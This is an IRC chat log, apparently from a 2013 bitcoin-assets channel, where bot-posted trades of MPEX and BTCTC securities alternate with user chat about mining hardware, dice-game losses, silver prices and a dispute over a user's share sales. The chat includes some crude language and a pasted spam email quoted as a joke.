19:06:24 [MPEX] [S.MPOE] 4321 @ 0.00065924 = 2.8486 BTC [-] Feb 15 19:06:25 [MPEX] [S.MPOE] 6379 @ 0.00065935 = 4.206 BTC [+] Feb 15 19:18:01 any of the havelock s.dice buyers here? Feb 15 19:18:22 curious as to why they're paying the 0.75 when it's 0.6x everywhere else. Feb 15 19:26:10 Diablo-D3: Hey, I can't find it now: where was the original offer to shareholders to be able to trade-in 200 (or so) shares for their future boards? Feb 15 19:26:21 Diablo-D3: Re: asicminer. Feb 15 19:33:48 midnightmagic: for what? Feb 15 19:33:55 oh Feb 15 19:34:01 I dunno if they ever offered that Feb 15 19:34:04 I dont remember it, anyways Feb 15 19:42:08 midnightmagic: only 200 shares though? wow Feb 15 19:42:18 I wonder if I get the rack for free if I order a racks worth =P Feb 15 19:47:40 :-/ Feb 15 19:47:45 dammit. Feb 15 19:50:02 [MPEX] [S.MPOE] 4321 @ 0.00065181 = 2.8165 BTC [-] Feb 15 19:50:04 [MPEX] [S.MPOE] 1829 @ 0.00065209 = 1.1927 BTC [+] Feb 15 19:57:00 [MPEX] [S.MPOE] 4321 @ 0.00065104 = 2.8131 BTC [-] Feb 15 19:57:02 [MPEX] [S.MPOE] 8350 @ 0.00065099 = 5.4358 BTC [-] Feb 15 19:57:04 [MPEX] [S.MPOE] 4137 @ 0.0006508 = 2.6924 BTC [-] Feb 15 20:26:44 [MPEX] [S.MPOE] 4321 @ 0.00065188 = 2.8168 BTC [+] Feb 15 20:26:46 [MPEX] [S.MPOE] 7079 @ 0.00065209 = 4.6161 BTC [+] Feb 15 20:27:35 [MPEX] [S.MPOE] 4300 @ 0.00065209 = 2.804 BTC [+] Feb 15 20:33:13 [HAVELOCK] [SDICE] 9 @ 0.759 = 6.831 BTC [+] Feb 15 20:33:15 [HAVELOCK] [SDICE] 1 @ 0.759 BTC [+] Feb 15 20:37:14 [MPEX] [S.MPOE] 1800 @ 0.00065209 = 1.1738 BTC [+] Feb 15 21:03:32 anyone here got gored by the bear trap? Feb 15 21:04:08 [MPEX] [S.MPOE] 4321 @ 0.00065086 = 2.8124 BTC [-] Feb 15 21:04:14 [MPEX] [S.MPOE] 9379 @ 0.0006508 = 6.1039 BTC [-] Feb 15 21:04:52 ;;ticker Feb 15 21:04:53 BTCUSD ticker | Best bid: 27.00000, Best ask: 27.06999, Bid-ask spread: 0.06999, Last trade: 27.06999, 24 hour volume: 71831.38472749, 24 hour low: 26.10300, 24 hour high: 27.59690, 24 hour vwap: 26.98392 Feb 15 21:05:11 what bear trap? Feb 15 21:05:43 i started to slowly exercise my calls, like, one per day... but otherwise am bullish Feb 15 21:06:20 a couple days ago when we hit 21 Feb 15 21:06:28 then rebounded to 25 the same day Feb 15 21:07:19 Mhm, someone lost 200 BTC to the dice.. ouch Feb 15 21:08:04 http://satoshidice.com/lookup.php?tx=b4d75b&limit=100&min_bet=0&status=ALL Feb 15 21:08:19 its on the biggest losers page Feb 15 21:08:37 its just 10 mins ago Feb 15 21:09:36 looks like a mini whale address.. they lost all their money Feb 15 21:10:23 well, mini whale. baby Feb 15 21:10:42 it had 7k bitcoins recieved Feb 15 21:10:50 so hes been playing for a while Feb 15 21:11:19 yeah 1 btc left Feb 15 21:13:33 im gonna need a job soon Feb 15 21:13:37 >_> Feb 15 21:14:04 [MPEX] [S.MPOE] 4321 @ 0.0006518 = 2.8164 BTC [+] Feb 15 21:14:06 [MPEX] [S.MPOE] 4429 @ 0.00065209 = 2.8881 BTC [+] Feb 15 21:14:12 I got like 2 weeks left then I'll be cashflow negative Feb 15 21:16:27 !ticker m X.DIFF.MAR Feb 15 21:16:28 Things which are alike, in nature, grow to look alike, and the speaking stones have lain a long time lookin' at the sun. Feb 15 21:16:34 !ticker m XDIFF.MAR Feb 15 21:16:36 I don't know those people, and they don't look very friendly. Feb 15 21:17:42 !ticker m X.IDIFF.MAR Feb 15 21:17:43 [MPEX:X.IDIFF.MAR] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: 0.0429 / 0.0429 / 0.0429 (110 shares, 4.72 BTC), 30D: 0.0429 / 0.06514848 / 0.089 (330 shares, 21.50 BTC) Feb 15 21:17:50 !ticker m X.IDIFF.JUN Feb 15 21:17:52 [MPEX:X.IDIFF.JUN] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: / / ( shares, BTC), 30D: 0.08995 / 0.09418269 / 0.2 (260 shares, 24.49 BTC) Feb 15 21:17:59 !ticker m X.IDIFF.SEP Feb 15 21:18:00 Quest for vision is a great blessing. Feb 15 21:20:20 wtf is this.. Feb 15 21:20:29 Avalon batch no 2's specs keep on changing Feb 15 21:20:38 it was greater than 68, then at least 66.. now Feb 15 21:20:45 its greater than 65 Feb 15 21:27:45 [MPEX] [S.MPOE] 4050 @ 0.00065209 = 2.641 BTC [+] Feb 15 21:27:49 20:13.28 ( Bowjob ) im gonna need a job soon Feb 15 21:27:55 wrong direction of looking at things. Feb 15 21:28:17 ..mhm? Feb 15 21:29:09 well Feb 15 21:29:47 to me, having a job means you arent smart enough to live without having a job Feb 15 21:29:57 so you should be trying not to have a job. Feb 15 21:31:00 eh, i can live without a job for a few years.. it just gets boring watching bitcoins grow Feb 15 21:31:22 why only for a few years Feb 15 21:31:45 my bitcoin holdings arent that worth a fortune yet Feb 15 21:32:06 the what? Feb 15 21:32:22 i have been living by that since dunno when Feb 15 21:33:08 well, tbh, I'm funded by unemployment insurance, I took those monies and put it in bitcoins and watch bitcoins shoot up in value. Feb 15 21:33:16 i'll be recalled soon Feb 15 21:33:42 translate? Feb 15 21:34:16 obviously NOT! Feb 15 21:35:57 all sorts of stuff, i was doing some 3d photography when i was 18 then i was freelancing for a while, then building solar power plants for over a year and lots of stuff in between Feb 15 21:36:24 not really Feb 15 21:36:41 well not a regular job, i was never employed Feb 15 21:37:14 mostly short term well payed stuff Feb 15 21:37:19 paid Feb 15 21:37:33 did what Feb 15 21:38:08 its more of a projects thing Feb 15 21:38:10 i had projects Feb 15 21:38:12 not jobs Feb 15 21:38:23 who's on first? Feb 15 21:38:29 yeah, my employment card shows 0 days Feb 15 21:39:34 dunno, they have this shit here Feb 15 21:39:54 to track the record of your work Feb 15 21:39:55 [BTCTC] [S.MPOE-PT] 6 @ 0.00067 = 0.004 BTC [+] Feb 15 21:41:04 anywho i dont need to do any of that anymore i guess a part of that is btcs fault. Feb 15 21:46:33 i just got the free amazon ec2 instance setup. Feb 15 21:46:42 nice to have a free server out there. Feb 15 21:46:50 i highly recommend it. Feb 15 21:57:05 [MPEX] [S.MPOE] 4788 @ 0.00065209 = 3.1222 BTC [+] Feb 15 22:00:23 [MPEX] [S.MPOE] 2312 @ 0.00065503 = 1.5144 BTC [+] Feb 15 22:00:25 [MPEX] [S.MPOE] 4321 @ 0.00065097 = 2.8128 BTC [-] Feb 15 22:00:26 [MPEX] [S.MPOE] 7517 @ 0.00065079 = 4.892 BTC [-] Feb 15 22:00:59 [MPEX] [S.MPOE] 4321 @ 0.00065865 = 2.846 BTC [+] Feb 15 22:01:03 [MPEX] [S.MPOE] 60 @ 0.00065867 = 0.0395 BTC [+] Feb 15 22:01:05 [MPEX] [S.MPOE] 15900 @ 0.00065868 = 10.473 BTC [+] Feb 15 22:01:07 [MPEX] [S.MPOE] 4495 @ 0.00065935 = 2.9638 BTC [+] Feb 15 22:02:09 ;;seen smickles Feb 15 22:02:09 smickles was last seen in #bitcoin-assets 6 days, 17 hours, 51 minutes, and 25 seconds ago: pong Feb 15 22:09:05 [MPEX] [S.MPOE] 4321 @ 0.00065113 = 2.8135 BTC [-] Feb 15 22:09:07 [MPEX] [S.MPOE] 5929 @ 0.00065079 = 3.8585 BTC [-] Feb 15 22:12:17 it's so dead here today Feb 15 22:12:20 ;;slap deadweasel Feb 15 22:12:29 [MPEX] [S.MPOE] 4321 @ 0.00065107 = 2.8133 BTC [+] Feb 15 22:12:53 what can I do with an amazon web server? Feb 15 22:13:36 same stuff you can do with any web server, comeon man Feb 15 22:13:53 and its only free for a year by the way Feb 15 22:14:17 and you pay for going over on I/O and stuff Feb 15 22:17:58 DeadWEasel, set up btctalk mirror Feb 15 22:18:14 AWS is only a good deal if you need to compute on and off (can shutdown machine when not in use) or if you need to be able to massively scale quickly. Feb 15 22:18:16 so that scumbags can't just remove posts Feb 15 22:18:27 for an always-on small server, there are way better deals out there. Feb 15 22:20:27 yeah, i'm just using to upgrade my sysadmin skills Feb 15 22:20:36 wanted something always on Feb 15 22:20:39 and it's free for a year Feb 15 22:20:42 so yeah, learning Feb 15 22:21:05 jurov: why? Feb 15 22:21:13 who wants to be on btctalk? Feb 15 22:21:55 i mean, it's easy to make mess on btctalk and then remove whole threads as if nothing happened Feb 15 22:22:37 if someone archived stuff, that couldn't happen Feb 15 22:28:39 nice though, might be a good learning tool Feb 15 22:31:39 [MPEX] [S.MPOE] 4160 @ 0.00065092 = 2.7078 BTC [-] Feb 15 22:31:45 [MPEX] [S.DICE] 95 @ 0.00612 = 0.5814 BTC [-] Feb 15 22:31:47 [MPEX] [S.DICE] 1905 @ 0.00612 = 11.6586 BTC [-] Feb 15 22:35:14 the hardest part about mirroring forums is not geting detected and blocked Feb 15 22:35:32 thats not that hard. Feb 15 22:35:47 Ah, I believe it is time for S.BVPS to get delisted. Feb 15 22:35:51 no its not, but its easier than the scraping, storing and retrevial Feb 15 22:35:56 *harder Feb 15 22:39:56 [MPEX] [S.MPOE] 4700 @ 0.00065079 = 3.0587 BTC [-] Feb 15 22:54:13 !ticker m s.mpoe Feb 15 22:54:14 [MPEX:S.MPOE] 1D: 0.000637 / 0.0006518 / 0.00066328 (874816 shares, 570.21 BTC), 7D: 0.0006153 / 0.00065288 / 0.0007 (18491986 shares, 12,073.07 BTC), 30D: 0.00059445 / 0.00066233 / 0.0007 (74190390 shares, 49,138.58 BTC) Feb 15 22:54:18 !ticker m s.dice Feb 15 22:54:19 [MPEX:S.DICE] 1D: 0.006 / 0.00626871 / 0.0069 (112814 shares, 707.20 BTC), 7D: 0.00556183 / 0.00620172 / 0.0069 (1415112 shares, 8,776.14 BTC), 30D: 0.00085848 / 0.00581855 / 0.0075 (6759704 shares, 39,331.73 BTC) Feb 15 22:58:48 whats up :] Feb 15 23:01:29 ;;seen smickles Feb 15 23:01:30 smickles was last seen in #bitcoin-assets 6 days, 18 hours, 50 minutes, and 46 seconds ago: pong Feb 15 23:10:23 [MPEX] [S.MPOE] 1619 @ 0.00065092 = 1.0538 BTC [+] Feb 15 23:10:25 [MPEX] [S.MPOE] 4321 @ 0.00065549 = 2.8324 BTC [+] Feb 15 23:10:27 [MPEX] [S.MPOE] 2907 @ 0.0006555 = 1.9055 BTC [+] Feb 15 23:13:15 https://btcjam.com/listings/1811 Feb 15 23:15:10 yah smickles been afk for a minute Feb 15 23:17:29 hrm Feb 15 23:17:32 Namworld: yo Feb 15 23:25:40 [MPEX] [S.MPOE] 4321 @ 0.00065522 = 2.8312 BTC [-] Feb 15 23:25:42 [MPEX] [S.MPOE] 8440 @ 0.0006555 = 5.5324 BTC [+] Feb 15 23:25:44 [MPEX] [S.MPOE] 89 @ 0.00065687 = 0.0585 BTC [+] Feb 15 23:29:17 lol, pigeoons... nice find Feb 15 23:38:20 [MPEX] [S.MPOE] 9088 @ 0.00065687 = 5.9696 BTC [+] Feb 15 23:38:21 [MPEX] [S.MPOE] 5700 @ 0.00065745 = 3.7475 BTC [+] Feb 15 23:38:23 [MPEX] [S.MPOE] 2458 @ 0.00065935 = 1.6207 BTC [+] Feb 15 23:38:25 [MPEX] [S.MPOE] 1851 @ 0.00066344 = 1.228 BTC [+] Feb 15 23:38:27 [MPEX] [S.MPOE] 18233 @ 0.00066478 = 12.1209 BTC [+] Feb 15 23:53:18 [MPEX] [S.MPOE] 24617 @ 0.00066478 = 16.3649 BTC [+] Feb 15 23:53:20 [MPEX] [S.MPOE] 3783 @ 0.00066511 = 2.5161 BTC [+] Feb 15 23:55:17 [MPEX] [S.MPOE] 1883 @ 0.00065085 = 1.2256 BTC [-] Feb 15 23:55:24 [MPEX] [S.MPOE] 4321 @ 0.00065084 = 2.8123 BTC [-] Feb 15 23:55:26 [MPEX] [S.MPOE] 38543 @ 0.00065079 = 25.0834 BTC [-] Feb 15 23:55:28 [MPEX] [S.MPOE] 1053 @ 0.00065024 = 0.6847 BTC [-] Feb 16 00:14:04 [MPEX] [S.MPOE] 1960 @ 0.00065035 = 1.2747 BTC [+] Feb 16 00:21:00 [BTCTC] [COGNITIVE] 3 @ 0.34 = 1.02 BTC [+] Feb 16 00:21:18 [BTCTC] [COGNITIVE] 1 @ 0.385 BTC [+] Feb 16 00:22:38 [BTCTC] [S.MPOE-PT] 9 @ 0.00067 = 0.006 BTC [+] Feb 16 00:27:02 [MPEX] [S.DICE] 550 @ 0.00649174 = 3.5705 BTC [+] Feb 16 00:32:05 [MPEX] [S.MPOE] 7850 @ 0.00065901 = 5.1732 BTC [+] Feb 16 00:40:30 Notification Our company’s courier couldn’t make the delivery of parcel.REASON: Feb 16 00:40:30 Postal code contains an error. LOCATION OF YOUR PARCEL: KnoxvilleFort DELIVERY Feb 16 00:40:30 STATUS: sort order SERVICE: One-day Shipping NUMBER OF YOUR PARCEL: OFJ1EY6KIJ Feb 16 00:40:30 FEATURES: NoLabel is enclosed to the letter. Print a label and show it at your post Feb 16 00:40:30 office. Feb 16 00:40:37 if anyone is wondering where the avalons are... Feb 16 00:40:42 knoxville. Feb 16 00:42:20 mircea_popescu: wut? Feb 16 00:43:28 ya know, the lost 60 asics Feb 16 00:45:37 are in knoxville, you say? Feb 16 00:51:44 surely. Feb 16 00:51:59 so says an anonymous email i got from a russian server Feb 16 00:52:37 [BTCTC] [B.YABMC] 1 @ 0.02295 BTC [-] Feb 16 00:52:39 [MPEX] [S.MPOE] 2000 @ 0.00066508 = 1.3302 BTC [+] Feb 16 00:52:40 [MPEX] [S.MPOE] 4321 @ 0.00066509 = 2.8739 BTC [+] Feb 16 00:52:45 [MPEX] [S.MPOE] 6817 @ 0.00066511 = 4.5341 BTC [+] Feb 16 00:52:46 [MPEX] [S.MPOE] 7212 @ 0.00066592 = 4.8026 BTC [+] Feb 16 00:59:23 haha Feb 16 01:02:51 http://cdn.memegenerator.net/instances/400x/23743515.jpg haha that kid is supersweet Feb 16 01:03:07 The service is unavailable. Feb 16 01:03:14 aw Feb 16 01:03:57 [MPEX] [S.MPOE] 388 @ 0.00066592 = 0.2584 BTC [+] Feb 16 01:03:59 [MPEX] [S.MPOE] 1300 @ 0.00066695 = 0.867 BTC [+] Feb 16 01:04:07 [MPEX] [S.MPOE] 11471 @ 0.00066812 = 7.664 BTC [+] Feb 16 01:10:36 [MPEX] [S.DICE] 200 @ 0.00648 = 1.296 BTC [-] Feb 16 01:13:45 Bove uses several metrics to make his point, focusing on the dollar as a percentage of total world money supply.That total has plunged from nearly 90 percent in 1952 to closer to 15 percent now. He also notes that the Chinese yuan, the yen and the euro each have a greater share of that total. Feb 16 01:13:47 le ouch. Feb 16 01:18:36 [MPEX] [S.DICE] 600 @ 0.00615378 = 3.6923 BTC [-] Feb 16 01:27:11 So mircea, S.BVPS being delisted today? Feb 16 01:28:24 [MPEX] [S.MPOE] 4568 @ 0.00065901 = 3.0104 BTC [-] Feb 16 01:28:26 [MPEX] [S.MPOE] 897 @ 0.00065106 = 0.584 BTC [-] Feb 16 01:31:38 [MPEX] [S.MPOE] 1142 @ 0.00065106 = 0.7435 BTC [-] Feb 16 01:31:39 [MPEX] [S.MPOE] 4321 @ 0.00065104 = 2.8131 BTC [-] Feb 16 01:31:40 [MPEX] [S.MPOE] 11055 @ 0.00065103 = 7.1971 BTC [-] Feb 16 01:35:24 done deal. Feb 16 01:35:37 https://bitcointalk.org/index.php?topic=76506.msg1457231#msg1457231 Feb 16 01:35:44 Namworld ^ Feb 16 01:45:45 there is not, the wench is on the phone again. Feb 16 01:46:28 no, please tell Feb 16 01:46:54 forgive my ignorance, is that up or down? Feb 16 01:47:08 I didn't know if silver crashed or btc just high enough Feb 16 01:47:11 not watching silver Feb 16 01:47:15 hooray! Feb 16 01:47:18 no worries, it will bounce Feb 16 01:47:26 precious metal, there's a reason you got into it Feb 16 01:47:50 they are not to be looked at relative to each other. Feb 16 01:48:23 how would you leverage this opposite force? Feb 16 01:48:54 you think they are related somehow? Feb 16 01:49:19 i try not to, but I sometimes I do, stupidly Feb 16 01:49:38 it will, but what distance? Feb 16 01:49:50 tell me about it Feb 16 01:50:09 so you are saying hedge with metals when they are at the bototm? Feb 16 01:50:13 bottom* Feb 16 01:50:19 and btc is at a top? Feb 16 01:50:22 SUPPOSEDLY Feb 16 01:50:39 fuck I love groove salad radio station. Feb 16 01:50:49 i hear you Feb 16 01:51:27 i am with you. I like your jib. only, I'd have to correctly guess one top and one bottom of unrelated commodoties Feb 16 01:51:39 it's a radio station, one moment. Feb 16 01:52:18 me too, but I was on here, and some asshat said to hold. so I did. Feb 16 01:52:22 now he's not an asshat Feb 16 01:52:34 and I try not to get too far Feb 16 01:52:55 http://somafm.com/play/groovesalad Feb 16 01:53:07 I hate lyrics, but I love to chill, so this fills the gap Feb 16 01:54:09 usagi, has this method worked for you repeatedly? is there some relation in the peaks and dips of the two commodoties? Feb 16 01:54:31 are you making money with TU? Feb 16 01:54:39 true that Feb 16 01:54:40 good Feb 16 01:54:59 i'm glad, is it at a multiplier of the rising value of btc? Feb 16 01:55:16 as in, have you been able to sell BTC, grab silver, and then buy btc in a valley? Feb 16 01:55:47 mircea_popescu Feb 16 01:56:03 signatures verified, everything looks fine. Thank you. Feb 16 01:56:09 np np Feb 16 01:56:09 I've been looking at your fund for several weeks. no real movement on bitfunder. Feb 16 01:56:20 silver is low Feb 16 01:56:21 (15:47) < usagi> it's an all time low << pretty funny since Silver was @ 9.13 in oct 2008 Feb 16 01:56:22 no doubt Feb 16 01:56:42 might help. Feb 16 01:56:58 mircea_popescu's link to the angry mob about bitVPS was quite entertaining Feb 16 01:57:23 hm ? Feb 16 01:57:27 i hope so. no problem. keep me at the keyboard working for longer than i could with lyrics and pop shit. Feb 16 01:57:45 http://somafm.com/play/groovesalad Feb 16 01:57:46 that Feb 16 01:57:54 your welcome Feb 16 01:57:59 send me btc for free drugs Feb 16 01:58:04 :) Feb 16 01:58:18 true dat, you paid them at some point. Feb 16 01:58:52 1GdtkZzhZTzBssUq6bnE27cz4rv5SJ4sr5 in case your flashback is actually good enough. Feb 16 01:58:57 they never are Feb 16 01:59:52 i have one of their t-shirts, but I got from goodwill, so I don't know. Feb 16 01:59:56 it's very soft Feb 16 01:59:59 so I bought it Feb 16 02:00:47 thx truffles , if I 'member I'll jam into pandora Feb 16 02:01:08 mad packet loss here, waiting on new wifi card. Feb 16 02:01:38 can't even get the new walking dead Feb 16 02:01:56 too much loss. IRC don't mind though. nice old school protocol. Feb 16 02:02:00 expects packet loss Feb 16 02:02:43 but fucking black samurai chick, i want to know!!!! Feb 16 02:02:53 i bet she dies Feb 16 02:02:57 dumb ho got shot Feb 16 02:03:03 samurai evolution Feb 16 02:03:27 so3e09 methinks, according ot torrentz.eu Feb 16 02:03:51 she just showed up in that last, like 2 months ago, with a basket full of baby formula Feb 16 02:04:51 yeah it does. Feb 16 02:05:15 [MPEX] [S.MPOE] 2779 @ 0.00066812 = 1.8567 BTC [+] Feb 16 02:05:16 [MPEX] [S.MPOE] 4321 @ 0.00066947 = 2.8928 BTC [+] Feb 16 02:05:17 [MPEX] [S.MPOE] 8017 @ 0.00066948 = 5.3672 BTC [+] Feb 16 02:05:18 [MPEX] [S.MPOE] 4050 @ 0.00066986 = 2.7129 BTC [+] Feb 16 02:06:37 she is quite the twat. she should have lez'ed up with blacky and started their own colony. Feb 16 02:06:44 dumbasses Feb 16 02:06:58 i would clean up in zombie apocalypse. Feb 16 02:07:21 [MPEX] [S.MPOE] 2000 @ 0.00067002 = 1.34 BTC [+] Feb 16 02:07:37 my best description. biased, yet accurate. Feb 16 02:07:46 they totally wanted to. Feb 16 02:08:17 [MPEX] [S.MPOE] 5500 @ 0.00067002 = 3.6851 BTC [+] Feb 16 02:08:27 no shit, plus she discovered the "cover myself in organs" routine. Feb 16 02:08:39 that plus here zombie brother on chains, ain't no thang! Feb 16 02:08:46 here * her Feb 16 02:08:55 brothers. Feb 16 02:09:06 i hate that guy Feb 16 02:09:35 is that circular? Feb 16 02:09:42 or otherwise? Feb 16 02:10:02 plunge != circuluar Feb 16 02:10:55 my imagination fails me, usagi, but I will return, after I get the woman to feed me. Feb 16 02:13:40 [MPEX] [S.MPOE] 10323 @ 0.00067002 = 6.9166 BTC [+] Feb 16 02:13:42 [MPEX] [S.MPOE] 6950 @ 0.00066742 = 4.6386 BTC [-] Feb 16 02:13:50 [MPEX] [S.MPOE] 2027 @ 0.00065985 = 1.3375 BTC [-] Feb 16 02:13:51 [MPEX] [S.MPOE] 18988 @ 0.00065984 = 12.529 BTC [-] Feb 16 02:13:53 [MPEX] [S.MPOE] 9400 @ 0.00065544 = 6.1611 BTC [-] Feb 16 02:17:05 [MPEX] [S.MPOE] 4112 @ 0.0006522 = 2.6818 BTC [-] Feb 16 02:33:02 [BTCTC] [PAJKA.BOND] 4 @ 0.1 = 0.4 BTC [+] Feb 16 02:36:09 [MPEX] [S.MPOE] 438 @ 0.0006695 = 0.2932 BTC [+] Feb 16 02:36:26 [BTCTC] [BTC-BOND] 1 @ 0.00998 BTC [-] Feb 16 02:36:43 [BTCTC] [BTC-BOND] 4 @ 0.00999 = 0.04 BTC [+] Feb 16 02:38:48 usagi just go long on silver with btc? Feb 16 02:49:39 [BTCTC] [BTC-MINING] 7 @ 0.045 = 0.315 BTC [-] Feb 16 02:55:00 There's also a "Discrete Delivery" option, in which McCabe delivers the condoms to the student's door without the blue siren on his head. Feb 16 02:55:04 ahaha this is insanity. Feb 16 02:55:09 http://www.sfgate.com/technology/businessinsider/article/This-College-Student-Founded-A-Startup-Delivering-4279375.php Feb 16 03:02:38 [MPEX] [S.MPOE] 2262 @ 0.00066452 = 1.5031 BTC [-] Feb 16 03:02:39 [MPEX] [S.MPOE] 2438 @ 0.00066738 = 1.6271 BTC [+] Feb 16 03:07:13 invite code for coinbr? Feb 16 03:09:12 39deGbwZts Feb 16 03:09:47 thanks Feb 16 03:09:49 [BTCTC] [S.DICE-PT] 255 @ 0.0063 = 1.6065 BTC [+] Feb 16 03:09:58 no problem Feb 16 03:13:55 Thanks pass-through buyers **** BEGIN LOGGING AT Sat Feb 16 10:48:25 2013 Feb 16 10:53:49 [BTCTC] [GSDPT] 6 @ 0.00626 = 0.0376 BTC [-] Feb 16 11:09:10 [MPEX] [S.MPOE] 5500 @ 0.00067708 = 3.7239 BTC [+] Feb 16 11:09:13 [MPEX] [S.MPOE] 556 @ 0.00067787 = 0.3769 BTC [+] Feb 16 11:14:04 o, back to 67.7 huh Feb 16 11:14:05 ;;ticker Feb 16 11:14:06 BTCUSD ticker | Best bid: 27.03806, Best ask: 27.09999, Bid-ask spread: 0.06193, Last trade: 27.03807, 24 hour volume: 47020.05585313, 24 hour low: 26.10300, 24 hour high: 27.50617, 24 hour vwap: 26.98591 Feb 16 11:18:47 [BTCTC] [GSDPT] 2 @ 0.00626 = 0.0125 BTC [-] Feb 16 11:37:20 mircea_popescu: polimedia.us is some sort of spamming service? Feb 16 11:37:28 what ? Feb 16 11:37:44 i dunno, are you some sort of idiot ? Feb 16 11:38:40 ... excuse me. what? Feb 16 11:39:16 what does polimedia.us in fact do then? Feb 16 11:39:32 i just googled it and seems like ppl keep on complaining getting weird emails from polimedia.us Feb 16 11:39:32 mno, we're not quite there yet. Feb 16 11:39:46 we're at establishing who the fuck you are and what the fuck gives you the standing to ask stupid questions. Feb 16 11:39:55 polimedia stands on its own, it's a website on the internet. Feb 16 11:40:11 well i'll google things that i find interesting, then Feb 16 11:40:19 the fact that you're tolerated on an irc channel i happen to frequent does not by itself give you the position to ask loaded questions. Feb 16 11:40:35 and since we're on it, look up "loaded question", it'll benefit your education. Feb 16 11:41:11 [MPEX] [S.MPOE] 6000 @ 0.00066105 = 3.9663 BTC [-] Feb 16 11:41:16 well i googled polimedia.us and people seems to be complaining about SPAM EMAILS from your domain Feb 16 11:41:26 and u just say "dont ask me questions related to that" Feb 16 11:41:29 ok. Feb 16 11:42:10 no. Feb 16 11:42:19 i do not say "don't ask me questions related to that" Feb 16 11:42:31 i said, look up "loaded question", it will benefit your education. Feb 16 11:42:32 do that. Feb 16 11:43:10 [MPEX] [S.MPOE] 2140 @ 0.00065973 = 1.4118 BTC [-] Feb 16 11:43:13 [MPEX] [S.MPOE] 12660 @ 0.00065972 = 8.3521 BTC [-] Feb 16 11:43:54 nah i'll just search other things ;_; Feb 16 11:44:22 mircea_popescu: http://billmullins.wordpress.com/2008/02/28/scamming-by-spamming-%E2%80%93-they-just-won%E2%80%99t-quit/ Feb 16 11:44:23 [MPEX] [S.MPOE] 1540 @ 0.00065972 = 1.016 BTC [-] Feb 16 11:44:25 [MPEX] [S.MPOE] 486 @ 0.00065922 = 0.3204 BTC [-] Feb 16 11:45:35 its rather funny theyve still placed those "you are 100000000th visitor of this site U WONS A LOT THINGS CLICK HERES" ads on that blog Feb 16 11:46:32 [MPEX] [S.MPOE] 4200 @ 0.00066105 = 2.7764 BTC [+] Feb 16 12:00:15 [MPEX] [S.DICE] 347 @ 0.00639521 = 2.2191 BTC [-] Feb 16 12:04:29 [BTCTC] [RSM] 38 @ 0.0097 = 0.3686 BTC [-] Feb 16 12:10:02 [MPEX] [S.MPOE] 3100 @ 0.00066105 = 2.0493 BTC [+] Feb 16 12:10:04 [MPEX] [S.MPOE] 3400 @ 0.00066195 = 2.2506 BTC [+] Feb 16 12:20:10 [BTCTC] [GSDPT] 9 @ 0.00601 = 0.0541 BTC [-] Feb 16 12:20:44 [BTCTC] [GSDPT] 85 @ 0.006 = 0.51 BTC [-] Feb 16 12:20:46 [BTCTC] [GSDPT] 40 @ 0.006 = 0.24 BTC [-] Feb 16 12:21:29 [BTCTC] [GSDPT] 2 @ 0.00596 = 0.0119 BTC [-] Feb 16 12:22:09 [BTCTC] [GSDPT] 10 @ 0.00593 = 0.0593 BTC [-] Feb 16 12:22:38 [BTCTC] [GSDPT] 17 @ 0.00592 = 0.1006 BTC [-] Feb 16 12:23:14 [BTCTC] [GSDPT] 47 @ 0.00591 = 0.2778 BTC [-] Feb 16 12:25:56 There's half the dividends going to buying back shares at market rate, to be destroyed. Feb 16 12:26:22 So I guess the shares count should be diminishing. Feb 16 12:26:33 I think that was the motion long ago or something like that. Feb 16 12:28:40 [MPEX] [S.MPOE] 3195 @ 0.00065922 = 2.1062 BTC [-] Feb 16 12:28:42 [MPEX] [S.MPOE] 413 @ 0.00065761 = 0.2716 BTC [-] Feb 16 12:28:44 [MPEX] [S.MPOE] 22892 @ 0.0006576 = 15.0538 BTC [-] Feb 16 12:30:35 EskimoBob: yes, 11 DMC for 1 ASICMINER. Feb 16 12:33:21 oh that Feb 16 12:33:33 So I wonder when the trolls will shut up Feb 16 12:33:43 another one just popped up claiming I stole from shareholders Feb 16 12:34:42 and he claims he read the whole thread too Feb 16 12:35:01 if he read the whole thread, he would have already known nefario took GLBSE down before he got caught Feb 16 12:38:52 Except I never did. Feb 16 12:39:48 The original group of shareholders not only agreed with selling shares at below IPO price in exchange for mining bonds, but came up with the idea. Feb 16 12:40:37 er, why would I publish them? Feb 16 12:40:49 nefario is the only one that had access to them, and he refused Feb 16 12:43:16 s/why/how/ Feb 16 12:43:53 EskimoBob: infact, I'd like to know the exact total invested into DMC. I'll never know now. Feb 16 12:44:22 its somewhere around 1500-2000. Feb 16 12:44:31 [MPEX] [S.MPOE] 7600 @ 0.0006576 = 4.9978 BTC [-] Feb 16 12:45:13 about 1000. Feb 16 12:45:34 yes. Feb 16 12:45:41 Anduck dude, some idiot making some nonsense post in 2008 is hardly anything i need explain. Feb 16 12:45:43 ask him. Feb 16 12:46:23 mp: fine Feb 16 12:46:29 no but seriously Feb 16 12:46:37 it's the internet, anyone can write what they please. Feb 16 12:46:43 do i ask you to explain why bitcoin is a scam ? Feb 16 12:46:50 because i read it on somesitenobodyknows ? Feb 16 12:47:27 EskimoBob: because people are dumb. Feb 16 12:47:38 and its probably closer to 750. Feb 16 12:47:53 remember, I've recovered half the shares, so I only need to clear half of whatever went in. Feb 16 12:48:16 EskimoBob: see what I just said. Feb 16 12:48:47 He recovered half the shares already... so 1000 BTC of shares left maybe. Feb 16 12:48:53 I sold a little over 20k shares, most for under 0.10 each (in trade for ASICMINER shares) Feb 16 12:49:20 Diablo-D3 how many did you sell at 1 each ? Feb 16 12:49:28 mircea_popescu: like 50. Feb 16 12:49:44 okay. Feb 16 12:49:56 seriously, no one was willing to invest at that price Feb 16 12:50:19 You could have asked nefario to do a stock split. Feb 16 12:50:25 Namworld: he refused Feb 16 12:50:30 oh Feb 16 12:50:33 he said he was going to add the feature later Feb 16 12:50:35 and never did Feb 16 12:51:11 he also said he was going to add logging dumps Feb 16 12:51:12 strangely enough, people post on forum about missing glbse. Feb 16 12:51:13 but never did Feb 16 12:52:52 o, also, ##buttcoin Feb 16 12:53:27 No one is missing it because it's still right there... Feb 16 12:53:54 of the last ~18k shares, I sold them for about 0.03 each Feb 16 12:54:16 which is about 540 BTC Feb 16 12:55:05 the first 2000 shares probably average around 0.66 or so Feb 16 12:55:12 [MPEX] [S.MPOE] 498 @ 0.0006576 = 0.3275 BTC [-] Feb 16 12:55:20 [MPEX] [S.MPOE] 15788 @ 0.00065759 = 10.382 BTC [-] Feb 16 12:55:34 so the amount that went in is probably closer to 1500 than 2000 Feb 16 13:00:51 EskimoBob: so if you too want to claim I stole or did fraud, um, you're going to have to actually look up the definitions of those. 